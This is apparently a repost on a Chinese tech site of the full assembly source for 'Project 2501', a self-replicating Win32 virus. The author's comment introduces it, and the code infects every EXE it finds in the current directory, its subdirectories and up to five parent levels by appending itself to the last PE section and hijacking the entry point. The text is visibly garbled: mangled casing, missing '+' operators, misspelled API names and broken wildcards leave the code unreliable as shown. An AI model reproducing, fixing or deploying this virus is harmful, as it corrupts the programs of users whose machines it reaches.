2. Tech
  3. Win32

Win32

xiaoxiao2021-03-05  24

Comment *

Name: Project 2501

OS: Win32

CODER Belial

Heya,

this is my first pe-infector.wow, a great feput

To Have finished it.

Credits Go Out to Lord Julus and Billybelceb, Because

Of their win32 Tuturials.without Them, I Would Never

Have Finished This Creation.it TOOK Me Nearly a year to ofread

TO Understand All The Important Aspects of Win32-Assembly.

Greetings Go Out Wallo, Raven and The Whole Virus-Channel on Undernet.

Also Greetings to BillyBoy from micro $ OFT.THANX for Your

Nice Viriiparadise-Os.But Not Sooooo Much Bugs in Future, OK?

I Tested this Virus Only Under Win98, SO I DONT KNOW

Wether IT Works Under WinMe, Winnt or Win95.But Im SureBody Will Try

IT OUT.

The Virus Is A Runtime EXE Infector.it Infects All Files

In Current Dir And All His Subdirectories.After this, It makes

One Dotdot and Infects New Files and Subdirs UnTil IS

IN C: / or Five Dotdots Are Done.The Only Payload My Virus HAS

Is A Directory on The Desktop Named "Project2501" .it is

Created Each Run.im Thinking of Putting A TXTFILE

In this Directory, But I Have No Real Motivation

At the moment.a bedder payload is in progress.and

A nice encryption, I hope.if you think this Virus

May Be a bit incomplete (no encryption and no kewl

PayLoad) Thani I Have to Say:

WITH RELESING THIS SOURCE I RELEASE A LOADED

Gun.in The Wrong Hands, IT Could Be Awful for Some

Harmless User.so if I Release Guns I DONT WANT TO RELEASE

"full-automatic-guns" .thats for now

Belial

*

.586

.MODEL FLAT

.DATA

DB 0

DB 'this is the first generation of project2501'

.code

Start:

Call Delta_Setup

Delta_setup:

POP EBP

Sub EBP, Offset Delta_Setup

GET_THOSE_APIS:

MOV EAX, DWORD PTR [ESP]

And Eax, 0FFFF0000h

MOV ECX, 0

Call find_mz_and_pe

Call find_all_apis

Infection_part:

MOV BYTE PTR [EBP DIR_COUNTER], 0

MOV BYTE PTR [EBP AM_I_UP], 0

MOV EAX, DWORD PTR [EBP Image_BASE]

MOV DWORD PTR [EBP Image_BASE2], EAX

MOV EAX, DWORD PTR [EBP OLD_ENTRY_POINT]

MOV DWORD PTR [EBP OLD_ENTRY_POINT2], EAX

Call seek_and_destroy

PayLoad_Part:

Call payload

Reanimation_part:

CMP EBP, 0

JE EXIT_HERE

MOV EAX, DWORD PTR [EBP Image_BASE2]

Add Eax, DWORD PTR [EBP OLD_ENTRY_POINT2]

JMP EAX

EXIT_HERE:

PUSH 0

Call [EBP EXITPROCESS]

FIND_MZ_AND_PE PROC

Add ECX, 1

CMP ECX, 11

JE MZ_NOT_FOND

MOV BX, Word Ptr [EAX]

CMP BX, 'ZM'

JE FIND_THE_PE

Sub Eax, 010000H

JMP FIND_MZ_AND_PE

Find_the_pe:

Mov ESI, EAX

MOV EBX, DWORD PTR [EAX 3CH]

Add Eax, EBX

MOV BX, Word Ptr [EAX]

CMP BX, 'EP'

JNE MZ_NOT_FOND

MOV DWORD PTR [EBP KERNELBASE], ESI

MOV DWORD PTR [EBP KERNELPEHEADER], EAX

RET

MZ_NOT_FOND:

JMP Reanimation_PART

FIND_MZ_AND_PE ENDP

Find_apis proc

POP ESI

POP EAX

MOV DWORD PTR [EBP APINAMEOFFSET], EAX

POP EAX

MOV DWORD PTR [EBP APIENGHT], EAX

POP EAX

MOV DWORD PTR [EBP PUTITTHERE], EAX

PUSH ESI

MOV EAX, DWORD PTR [EBP KERNELPEHEADER]

Mov ESI, DWORD PTR [EAX 78H]

Add ESI, DWORD PTR [EBP KERNELBASE]

Add ESI, 1CH

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP AdRess_Table_va], EAX

Add ESI, 4

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP NAME_TABLE_VA], EAX

Add ESI, 4

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP Ordinal_Table_va], EAX

MOV ESI, DWORD PTR [EBP NAME_TABLE_VA]

MOV DWORD PTR [EBP APICOUNTER], 00000000h

Find_the_name: Push ESI

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

Mov ESI, EAX

MOV EDI, DWORD PTR [EBP APINAMEOFFSET]

MOV ECX, 0

Mov Cl, Byte PTR [EBP APIENGHT]

CLD

REP CMPSB

JZ WE_FOUND_IT

POP ESI

Add ESI, 4

Inc DWORD PTR [EBP APICOUNTER]

JMP Find_The_Name

WE_FOUND_IT:

POP ESI; Taken from Billybel

MOV EAX, DWORD PTR [EBP APICOUNTER]

SHL EAX, 1

Add Eax, DWORD PTR [EBP Ordinal_Table_va]

MOV ESI, 0

XCHG Eax, ESI

Lodsw

SHL EAX, 2

Add Eax, DWORD PTR [EBP AdRess_table_va]

Mov ESI, EAX

Lodsd

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV ECX, DWORD PTR [EBP PUTITTHERE]

Mov DWORD PTR [ECX], EAX

RET

Find_apis endp

FIND_ALL_APIS PROC

Lea Eax, [EBP OFFSET EXITPROCESS]

Push EAX

Push DWORD PTR [EBP EXITPROCESSLENGHT]

Lea Eax, [EBP OFFSET _EXITPROCESS]

Push EAX

Call find_apis

Lea Eax, [EBP Offset FindfirstFilea]

Push EAX

Push DWORD PTR [EBP FINDFIRSTFILENGHT]

Lea Eax, [EBP OFFSET _FINDFIRSTFILEA]

Push EAX

Call find_apis

Lea Eax, [EBP OFFSET FINDNEXTFILEA]

Push EAX

Push DWORD PTR [EBP FINDNEXTFILENGHT]

Lea Eax, [EBP Offset _FindNextFilea]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreateFilea]

Push EAX

Push DWORD PTR [EBP CREATEFILENGHT]

Lea Eax, [EBP OFFSET _CREATEFILEA]

Push EAX

Call find_apis

Lea Eax, [EBP OFFSET CloseHandle]

Push EAX

Push DWORD PTR [EBP CloseHandLelenght]

Lea Eax, [EBP OFFSET _CLOSEHANDLE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreateFilemappinga]

Push EAX

Push DWORD PTR [EBP CREATEFILEMAPPINGLENGHT]

Lea Eax, [EBP Offset _CreateFilemappinga]

Push EAX

Call find_apis

Lea Eax, [EBP Offset MapViewOffile]

Push EAX

Push DWORD PTR [EBP MAPVIEWOFFILENGHT] Lea Eax, [EBP OFFSET _MAPVIEWOFFILE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset UnmapViewOffile]

Push EAX

Push DWORD PTR [EBP UnmapViewOffileLenght]

Lea Eax, [EBP OFFSET _UNMAPVIEWOFFILE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset getFileSize]

Push EAX

Push DWORD PTR [EBP GETFILESIZELENGHT]

Lea Eax, [EBP OFFSET _GETFILESIZE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset SetFilePointer]

Push EAX

Push DWORD PTR [EBP SETFILEPOINTERLENGHT]

Lea Eax, [EBP OFFSET _SETFILEPOINTER]

Push EAX

Call find_apis

Lea Eax, [EBP Offset STENDOFFILE]

Push EAX

Push DWORD PTR [EBP STENDOFFileLenght]

Lea EAX, [EBP Offset _sendoffile]

Push EAX

Call find_apis

Lea Eax, [EBP Offset SetCurrentDirectorya]

Push EAX

Push DWORD PTR [EBP SETCURRENTDIRECTORYLENGHT]

Lea Eax, [EBP Offset _SetCurrentDirectorya]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreatedIRectorya]

Push EAX

Push DWORD PTR [EBP CREATEDIRECTORYENGHT]

Lea Eax, [EBP OFFSET _CREATEDIRECTORYA]

Push EAX

Call find_apis

RET

FIND_ALL_APIS ENDP

Seek_and_destroy Proc

Find_first_file:

MOV BYTE PTR [EBP Infection_Flag], 0

Lea Eax, [EBP Offset FindfileData]

Push EAX

Lea Eax, [EBP OFFSET TOSEARCH]

Push EAX

Call [EBP FINDFIRSTFILEA]

MOV DWORD PTR [EBP FINDFILEHANDLE], EAX

INC EAX

JZ NO_FILES_LEFT

JMP Open_THE_FILE

Find_next_file:

MOV BYTE PTR [EBP Infection_Flag], 0

Lea Eax, [EBP Offset FindfileData]

Push EAX

Push DWORD PTR [EBP FINDFILEHANDLE]

Call [EBP FINDNEXTFILEA]

Test Eax, EAX

JZ NO_FILES_LEFT

Open_THE_FILE:

PUSH 0

PUSH 0

Push 3

PUSH 0

Push 1

PUSH 80000000H 40000000H

Lea Eax, [EBP Offset FindfileData.cfileName] Push Eax

Call [EBP CREATEFILEA]

CMP EAX, 0FFFFFFFH

JE FIND_NEXT_FILE

Mov DWORD PTR [EBP FILEHANDLE], EAX

PUSH 0

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP GETFILESIZE]

Calculate_new_size:

MOV DWORD PTR [EBP Thefilesize], EAX

Add Eax, Virus_END-START

Add Eax, 100

Now_make_file_mapping:

PUSH 0

Push EAX

PUSH 0

Push 4

PUSH 0

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP CREATEFILEMAPPINGA]

MOV DWORD PTR [EBP FilemAppingHandle], EAX

MOV EAX, DWORD PTR [EBP ThefileSize]

Add Eax, Virus_END-START

Add Eax, 100

Push EAX

PUSH 0

PUSH 0

Push 2

Push DWORD PTR [EBP FileMappingHandle]

Call [EBP MAPVIEWOFFILE]

MOV DWORD PTR [EBP MAPADRESS], EAX

CMP Word PTR [EAX], 'ZM'

JNE Search_another

MOV EBX, 0

MOV BX, Word PTR [EAX 3CH]

CMP Word PTR [EAX EBX], 'EP'

JNE Search_another

CMP Word PTR [EAX 38H], 'AA'

JE Search_another

Call infect_file

Search_another:

CMP BYTE PTR [EBP Infection_Flag], 1

JE close_normal

Call close_not_normal

Close_normal:

Push DWORD PTR [EBP MAPADRESS]

Call [EBP UnmapViewOffile]

Push DWORD PTR [EBP FileMappingHandle]

Call [EBP CloseHandle]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP CloseHandle]

JMP Find_Next_File

NO_FILES_LEFT:

CMP BYTE PTR [EBP AM_I_UP], 1

JE Go_Down

Lea Eax, [EBP Offset FindfileData]

Push EAX

Lea Eax, [EBP Offset AllFiles]]

Push EAX

Call [EBP FINDFIRSTFILEA]

MOV DWORD PTR [EBP DIR_Search_Handle], EAX

INC EAX

JZ NO_DIRS_LEFT

CMP BYTE PTR [EBP FINDFILEDATA.CFILENAME], '.'

JE FIND_NEXT_DIR

JMP IS_IT_DIR

Find_next_dir:

Lea Eax, [EBP Offset FindfileData]

Push EAX

Push DWORD PTR [EBP DIR_SEARCH_HANDLE] CALL [EBP FINDNEXTFILEA]

Test Eax, EAX

JZ NO_DIRS_LEFT

CMP BYTE PTR [EBP FINDFILEDATA.CFILENAME], '.'

JE FIND_NEXT_DIR

IS_IT_DIR:

CMP DWORD PTR [EBP FINDFILEDATA.DWFILEATTRIBUTES], 10H

JE IT_IS_DIR

JMP Find_Next_Dir

IT_IS_DIR:

Lea Eax, [EBP FINDFILEDATA.CFILENAME]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

MOV BYTE PTR [EBP AM_I_UP], 1

JMP Find_First_File

NO_DIRS_LEFT:

Lea Eax, [EBP OFFSET DOTDOT]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

Add Byte PTR [EBP DIR_COUNTER], 1

CMP BYTE PTR [EBP DIR_COUNTER], 5

JE all_for_now

MOV BYTE PTR [EBP AM_I_UP], 0

JMP Find_First_File

ALL_FOR_NOW:

RET

Go_down:

Lea Eax, [EBP OFFSET DOTDOT]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

MOV BYTE PTR [EBP AM_I_UP], 0

JMP Find_Next_Dir

Seek_and_destroy ENDP

CLOSE_NOT_NORMAL PROC

PUSH 0

PUSH 0

Push DWORD PTR [EBP ThefileSize]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP SETFILEPOINTER]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP STENDOFFILE]

RET

CLOSE_NOT_NORMAL ENDP

Infect_file proc

MOV BYTE PTR [EBP Infection_Flag], 1

MOV EAX, DWORD PTR [EBP MAPADRESS]

Mov Word PTR [EAX 38H], 'AA'

Mov EDI, 0

MOV DI, Word PTR [EAX 3CH]

Add Eax, EDI; Peheader At Eax

MOV DWORD PTR [EBP Peheader_offset], EAX

Mov ESI, DWORD PTR [EAX 28H]

MOV DWORD PTR [EBP OLD_ENTRY_POINT], ESI

MOV ESI, DWORD PTR [EAX 3CH]

MOV DWORD PTR [EBP FILE_ALLIGN], ESI

MOV ESI, DWORD PTR [EAX 34H]

MOV DWORD PTR [EBP Image_BASE], ESI

Mov ESI, EAX

GO_TO_LAST_SECTION:

MOV EBX, DWORD PTR [ESI 74H]

SHL EBX, 3

MOV EAX, 0

MOV AX, Word PTR [ESI 6H]

Dec EAX

MOV ECX, 28h

Mul ECX

Add ESI, 78H

Add ESI, EBX

Add ESI, ESI

Modify_it:

OR DWORD PTR [ESI 24H], 00000020H

OR DWORD PTR [ESI 24h], 20000000H

OR DWORD PTR [ESI 24H], 80000000H

Mov Eax, [ESI 10h]; Code Taken from Lord Julus (IM NOT Good In Math)

MOV DWORD PTR [EBP OLD_RAW_SIZE], EAX

Add DWORD PTR [ESI 8H], (Offset Virus_end - Offset Start)

Mov Eax, DWORD PTR [ESI 8h]

MOV ECX, DWORD PTR [EBP FILE_ALLIGN]

Div ECX

MOV ECX, DWORD PTR [EBP FILE_ALLIGN]

SUB ECX, EDX

Mov DWORD PTR [ESI 10H], EAX

Mov Eax, DWORD PTR [ESI 8h]

Add Eax, DWORD PTR [ESI 10h]

Mov DWORD PTR [ESI 10H], EAX

MOV DWORD PTR [EBP New_RAW_SIZE], EAX

MOV EAX, DWORD PTR [ESI 0CH]

Add Eax, DWORD PTR [ESI 8H]

SUB EAX, (Offset Virus_end-Offset Start)

MOV DWORD PTR [EBP New_ENTRY], EAX

MOV EAX, DWORD PTR [EBP OLD_RAW_SIZE]

MOV EBX, DWORD PTR [EBP NEW_RAW_SIZE]

SUB EBX, EAX

MOV DWORD PTR [EBP Inc_RAW_SIZE], EBX

MOV EAX, DWORD PTR [ESI 14H]

Add Eax, DWORD PTR [EBP NEW_RAW_SIZE]

MOV DWORD PTR [EBP New_FILE_SIZE], EAX

MOV EAX, DWORD PTR [ESI 14H]

Add Eax, DWORD PTR [ESI 8]

SUB EAX, (Offset Virus_end-Offset Start)

Add Eax, DWORD PTR [EBP MAPADRESS]

Mov Edi, EAX

Lea ESI, [EBP OFFSET START]

MOV ECX, (Offset Virus_end-Offset Start)

REP MOVSB

MOV ESI, DWORD PTR [EBP Peheader_offset]

MOV EAX, DWORD PTR [EBP New_ENTRY]

Mov DWORD PTR [ESI 28H], EAX

MOV EAX, DWORD PTR [EBP Inc_RAW_SIZE]

Add DWORD PTR [ESI 50H], ​​EAX

RET

Infect_file endp

PayLoad Proc

PUSH 0

Lea Eax, [EBP OFFSET DIR_NAME]

Push EAX

Call [EBP CREATEDIRECTORYA]

RET

PayLoad Endp

New_file_size DD 0

Inc_raw_size DD 0

New_ENTRY DD 0

NEW_RAW_SIZE DD 0

Old_raw_size dd 0

FILE_ALLIGN DD 0

PEHEADER_OFFSET DD 0

Image_base dd 0OLD_ENTRY_POINT DD 0

Image_base2 DD 0

Old_entry_point2 dd 0

KernelBase DD 0

KernelpeHeader DD 0

AdRess_table_va DD 0

Name_TABLE_VA DD 0

Ordinal_table_va DD 0

APICOUNTER DD 00000000H

ApinameOffset DD 0

Apilenght DD 0

Putitthere DD 0

EXITPROCESS DD 00000000H

_ExitProcess DB 'EXIXTPROCESS', 0

EXITPROCESSLENGHT DD 12

Findfirstfilea DD 00000000H

_FindfirstFilea DB 'Findfirstfilea', 0

FindfirstFileLenght DD 15

FINDNEXTFILEA DD 00000000H

_FindNextFilea DB 'FindNextFilea', 0

FindNextFileLenght DD 14

CreateFilea DD 00000000H

_CreateFilea DB 'Createfilea', 0

CreateFileLenght DD 12

CloseHandle DD 0000000000h

_CloseHandle DB 'CloseHandle', 0

CloseHandLelenght DD 12

CreateFilemappinga DD 00000000H

_CreateFileMappinga DB 'CreateFilemappinga', 0

CreateFilemappingLENGHT DD 19

MapViewOffile DD 00000000H

_MapViewoffile DB 'MapViewOffile', 0

MapViewOffileLenght DB 14

UnmapViewoffile DD 00000000H

_UnmapViewoffile db 'unmapviewoffile', 0

UnmapViewOffileLenght DD 16

GetFileSize DD 00000000H

_Getfilesize DB 'getFileSize', 0

GetFileSizeLenght DD 12

STENDOFFILE DD 00000000H

_SETENDOFFILE DB 'STENDOFFILE', 0

STENDOFFILENGHT DD 13

SetFilePointer DD 00000000h

_SetFilePointer DB 'SetFilePointer', 0

SetFilePointerLENGHT DD 15

SetCurrentDirectorya DD 0

_SetcurrentDirectorya DB 'setCurrentDirectorya', 0

SetCurrentDirectoryLENGHT DD 21

CreatedIRectorya DD 0

_CreatedDirectorya DB 'CreateDirectorya', 0

CreatedIRectoryLENGHT DD 17

Mapadress DD 0

Infection_flag db 0

Tosearch DB '* .exe', 0

FindfileHandle DD 0

FileHandle DD 0

ThefileSize DD 0

FilemappingHandle DD 0

Credit DB 'Project2501 WAS Coded by Belial'DB' Greetings to a Nice Girl from Scandinavia '

Dotdot DB '..', 0

Allfiles db '*. *', 0

Dir_search_handle DD 0

AM_I_UP DB 0

DIR_NAME DB 'C: / Windows / Desktop / Project2501', 0

Dir_counter db 0

MAX_PATH EQU 260

Filetime Struct

DWLOWDATETIME DWORD?

DWHIGHDATETIME DWORD?

Filetime Ends

Win32_find_data struct

DWFileAttributes DWORD?

FTCREATIONTIME FileTime <>

FTLASTACCESSTIME FileTime <>

FTLASTWRITIME FileTime <>

NFILESIZEHIGH DWORD?

NFILESZELOW DWORD?

DWRESERVED0 DWORD?

DWRESERVED1 DWORD?

CFILENAME BYTE MAX_PATH DUP (?)

Calternate Byte 0Eh DUP (?)

ENDS

FindFileData Win32_Find_Data <>

Virus_end:

End Start

转载请注明原文地址:https://www.9cbs.com/read-37084.html

9cbs

New Post(0)